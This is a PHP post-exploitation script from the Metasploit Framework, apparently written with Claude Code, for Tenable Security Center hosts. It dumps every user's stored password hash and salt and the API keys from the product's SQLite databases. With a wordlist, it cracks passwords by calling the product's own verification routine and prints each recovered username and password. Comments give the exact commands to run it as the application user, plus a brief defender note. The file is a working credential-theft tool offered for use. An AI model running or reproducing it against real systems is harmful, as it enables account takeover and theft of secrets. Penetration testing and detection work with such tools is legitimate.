GitHub Repository: rapid7/metasploit-framework
Path: blob/master/data/post/tenable/security_center/dump_crack_hashes.php
<?php

// generated by Claude Code
// su - tns -s /bin/bash -c '/opt/sc/support/bin/php /tmp/dump_hashes.php 2>&1'
// echo -e "test\npassword\nadmin\nwrongpass" > /tmp/test_wordlist.txt
// su - tns -s /bin/bash -c '/opt/sc/support/bin/php /tmp/dump_hashes.php -crack /tmp/test_wordlist.txt 2>&1'
//
// Purpose: runs on a Tenable Security Center host with the product's own PHP
// and libraries. It reads the UserAuth rows of /opt/sc/application.db and of
// every /opt/sc/orgs/*/organization.db, plus the APIKey table, and either
// prints them (default list mode, text or -json) or, with "-crack <wordlist>",
// tests every wordlist entry against every loaded user by calling the
// product's AuthenticationLib::goodPassword(). No hash algorithm is
// re-implemented here; verification is delegated to the product library.
//
// Output contract (presumably parsed by the post module that deploys this
// file, since it lives under data/post/ — keep the formats stable):
//   STDOUT  list mode:  text rows, or one JSON array with -json
//           crack mode: "CRACKED: id=.. username=.. password=.." lines,
//                       or one JSON array with -json
//   STDERR  usage error, periodic progress, final summary
//
// Defender note: the observable, per the invocation lines above, is the SC
// application user (tns) launching /opt/sc/support/bin/php on a script
// located outside /opt/sc; crack mode additionally invokes
// AuthenticationLib::goodPassword() once per (user, word) pair.

// Presumably read by defines.php / the SC libraries to locate the install — not visible here.
$GLOBALS["root"] = "/opt/sc";
require_once "/opt/sc/src/defines.php";
require_once "/opt/sc/src/lib/AuthenticationLib.php";
// Meaning of the two arguments is defined by the product's dbLib, not shown here.
dbLib::setup(1, false);

// Flags are position-independent; argv values are always strings, so the
// non-strict in_array() is safe here.
$jsonMode = in_array("-json", $argv);
$crackMode = in_array("-crack", $argv);
$wordlist = null;

// Find wordlist argument (value after -crack). If -crack appears more than
// once, the last occurrence wins. Note that "-crack -json" would take "-json"
// as the path, which then fails the file_exists() check below.
foreach ($argv as $i => $arg) {
    if ($arg === "-crack" && isset($argv[$i+1])) {
        $wordlist = $argv[$i+1];
    }
}

// Crack mode requires an existing wordlist path; readability is not checked
// here (see the fopen() note below).
if ($crackMode && (!$wordlist || !file_exists($wordlist))) {
    fwrite(STDERR, "Usage: php dump_hashes.php -crack /path/to/wordlist.txt [-json]\n");
    exit(1);
}

// Load users
$appdb = new PDO("sqlite:/opt/sc/application.db");
// Admin membership is decided by a case-insensitive username match against AdminUser.
$adminUsers = $appdb->query("SELECT username FROM AdminUser")->fetchAll(PDO::FETCH_COLUMN);
$adminSet = array_map("strtolower", $adminUsers);
// Every UserAuth column is kept (SELECT *); the schema itself is not visible here.
$users = $appdb->query("SELECT * FROM UserAuth")->fetchAll(PDO::FETCH_ASSOC);
// isAdmin is stored as the strings "true"/"false", not booleans — presumably so
// that text and JSON output both print a literal word.
foreach ($users as &$u) {
    $u["isAdmin"] = in_array(strtolower($u["username"]), $adminSet) ? "true" : "false";
}
unset($u);

// Also load org DB users
foreach (glob("/opt/sc/orgs/*/organization.db") as $orgdb) {
    $db2 = new PDO("sqlite:$orgdb");
    // $tables holds at most the single name "UserAuth" because of the WHERE
    // clause, so the interpolated table name below cannot be anything else.
    $tables = $db2->query("SELECT name FROM sqlite_master WHERE type='table' AND name='UserAuth'")->fetchAll(PDO::FETCH_COLUMN);
    foreach ($tables as $t) {
        $rows = $db2->query("SELECT * FROM $t")->fetchAll(PDO::FETCH_ASSOC);
        foreach ($rows as &$row) {
            // Org users are checked against the same application-level AdminUser set.
            $row["isAdmin"] = in_array(strtolower($row["username"]), $adminSet) ? "true" : "false";
            // Org rows are tagged with the DB they came from; application.db
            // rows get their _source only in JSON list mode further down.
            $row["_source"] = $orgdb;
        }
        unset($row);
        $users = array_merge($users, $rows);
    }
}

// Load API keys
$apikeys = $appdb->query("SELECT * FROM APIKey")->fetchAll(PDO::FETCH_ASSOC);

if ($crackMode) {
    // Crack mode
    // $cracked maps "uid:username" => matched word; $results collects JSON rows.
    $cracked = [];
    // NOTE(review): the fopen() result is not checked; an unreadable wordlist
    // would surface as warnings from feof()/fgets() rather than a clean exit.
    $fh = fopen($wordlist, "r");
    $i = 0;            // number of non-empty words tried so far
    $start = microtime(true);
    $results = [];

    while (!feof($fh)) {
        // At EOF fgets() returns false; trim(false) yields "" and the
        // iteration is skipped, so the final loop pass is harmless.
        $word = trim(fgets($fh));
        if ($word === "") continue;
        $i++;

        // Progress line on STDERR every 500 words.
        if ($i % 500 === 0) {
            $elapsed = microtime(true) - $start;
            $rate = round($i / $elapsed);
            fwrite(STDERR, "[$i tried | {$rate}/sec | " . count($cracked) . "/" . count($users) . " cracked]\n");
        }

        foreach ($users as $user) {
            $uname = $user["username"];
            // The id column name differs between the DBs that were read
            // (id vs userID is accepted); "?" if neither exists.
            $uid = $user["id"] ?? $user["userID"] ?? "?";
            $key = $uid . ":" . $uname;
            // Skip users that already have a match.
            if (isset($cracked[$key])) continue;
            try {
                // Argument order as expected by the product library:
                // authType, orgID, username, candidate, stored password, salt.
                if (AuthenticationLib::goodPassword($user["authType"], $user["orgID"], $uname, $word, $user["password"], $user["salt"])) {
                    $cracked[$key] = $word;
                    if ($jsonMode) {
                        $results[] = ["id" => $uid, "username" => $uname, "password" => $word, "isAdmin" => $user["isAdmin"]];
                    } else {
                        echo "CRACKED: id=$uid username=$uname password=$word\n";
                    }
                    // Push each hit out immediately rather than at exit.
                    flush();
                }
            // NOTE(review): any library error for this (user, word) pair is
            // swallowed and is indistinguishable from "no match".
            } catch (Throwable $e) { continue; }
        }

        // Early exit once every user has a match. NOTE(review): if two loaded
        // rows share the same "uid:username" key, count($cracked) can never
        // reach count($users) and the loop only ends when the wordlist does.
        if (count($cracked) === count($users)) break;
    }

    // Final summary on STDERR; max() guards the division for near-zero runtimes.
    $elapsed = round(microtime(true) - $start, 2);
    $rate = round($i / max($elapsed, 0.01));
    fwrite(STDERR, "Done. $i words in {$elapsed}s ({$rate}/sec). " . count($cracked) . "/" . count($users) . " cracked.\n");

    if ($jsonMode) echo json_encode($results, JSON_PRETTY_PRINT) . "\n";

} else {
    // Default list mode
    $results = [];

    if ($jsonMode) {
        // One flat array of user rows followed by API key rows; _table and
        // _source let the consumer tell them apart.
        foreach ($users as $u) {
            $u["_table"] = "UserAuth";
            // Org rows already carry their DB path; application.db rows get it here.
            $u["_source"] = $u["_source"] ?? "application.db";
            $results[] = $u;
        }
        foreach ($apikeys as $k) {
            $k["_table"] = "APIKey";
            $k["_source"] = "application.db";
            $results[] = $k;
        }
        echo json_encode($results, JSON_PRETTY_PRINT) . "\n";
    } else {
        // Text mode prints every column of every row, including the stored
        // password hash and salt columns returned by SELECT *.
        echo "\n" . str_repeat("=", 60) . "\n";
        echo "TABLE: application.db.UserAuth (" . count($users) . " rows)\n";
        echo str_repeat("=", 60) . "\n";
        foreach ($users as $i => $row) {
            echo " --- Row " . ($i+1) . " ---\n";
            foreach ($row as $col => $val) echo " $col: $val\n";
        }

        echo "\n" . str_repeat("=", 60) . "\n";
        echo "TABLE: application.db.APIKey (" . count($apikeys) . " rows)\n";
        echo str_repeat("=", 60) . "\n";
        foreach ($apikeys as $i => $row) {
            echo " --- Row " . ($i+1) . " ---\n";
            foreach ($row as $col => $val) echo " $col: $val\n";
        }

        // Terminator line so a consumer can detect a complete text dump.
        echo "\nDONE\n";
    }
}